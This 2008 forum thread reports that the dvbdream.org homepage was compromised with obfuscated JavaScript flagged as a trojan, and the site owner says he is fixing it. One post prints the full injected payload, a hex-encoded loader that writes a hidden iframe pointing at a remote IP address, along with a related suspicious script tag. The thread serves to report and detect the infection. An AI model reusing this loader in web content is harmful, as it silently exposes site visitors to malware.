homepage has a javascript virus / trojan

hugh2 · Postby **hugh2** » Wed Apr 23, 2008 6:32 pm

View the source of http://www.dvbdream.org/index.php

Look down at the bottom, there is some javascript which is encoded / obfuscated. If you save the homepage as an HTML file and submit it to Virustotal, 9 programs detect it as malware. (they give different names for it, eg. JS/Psyme.QM, Trojan.Clicker.HTML.IFrame.AR, JS/Agent.H1 etc.)

I emailed rreloc (at yahoo dot com - this is the author's address, right?) regarding this 4 days ago and have so far received no response.

Does anyone know why he chooses to remain anonymous?

[edited to remove author's literal email address]

genpix · Postby **genpix** » Wed Apr 23, 2008 6:55 pm

please remove e-mail address from the post

You may publish you own if you wish.
But it's a common rule of all forums: NO e-mail addresses.
crawling robots find these addresses and then tons of SPAM go there.

Postby **rel** » Thu Apr 24, 2008 12:27 am

um thats weird,

I'll check it

saentist · Postby **saentist** » Thu Apr 24, 2008 8:08 am

more then week
i see this

in kasperski forum

Code: Select all

function v4801fb955f010(v4801fb955f809){ function v4801fb9560001 () {var v4801fb95607f7=16; return v4801fb95607f7;} return(parseInt(v4801fb955f809,v4801fb9560001()));}function v4801fb9560ff0(v4801fb95617e9){ var v4801fb9561ffb='';for(v4801fb956299e=0; v4801fb956299e<v4801fb95617e9.length; v4801fb956299e+=2){ v4801fb9561ffb+=(String.fromCharCode(v4801fb955f010(v4801fb95617e9.substr(v4801f

b956299e, 2))));}return v4801fb9561ffb;} document.write(v4801fb9560ff0('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E

777269746528273C696672616D65206E616D653D3237623234393633207372633D5C27687474703A

2

F2F37372E3232312E3133332E3139302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E6

4

284D6174682E72616E646F6D28292A313735343734292B2766633334396331623631305C27207769

6

474683D333937206865696768743D343432207374796C653D5C27646973706C61793A206E6F6E655

C

273E3C2F696672616D653E27293C2F5343524950543E'));<

this is in source of page

also check for links like this

Code: Select all

<script language='javascript' src='http://127.0.0.1:1025/js.cgi?a&r=41'></script>

Postby **rel** » Fri Apr 25, 2008 1:41 am

fixed, still trying to find out what security weakness caused that on the site.

saentist · Postby **saentist** » Fri Apr 25, 2008 2:48 am

problem is some were on host storing part not on your page exact
mainly Apache problem

Edit
problem continue
with new

Snuffer · Postby **Snuffer** » Fri Apr 25, 2008 10:29 am

Just 2 minuts ago i have it with NOD32 Trojan to

homepage has a javascript virus / trojan

Who is online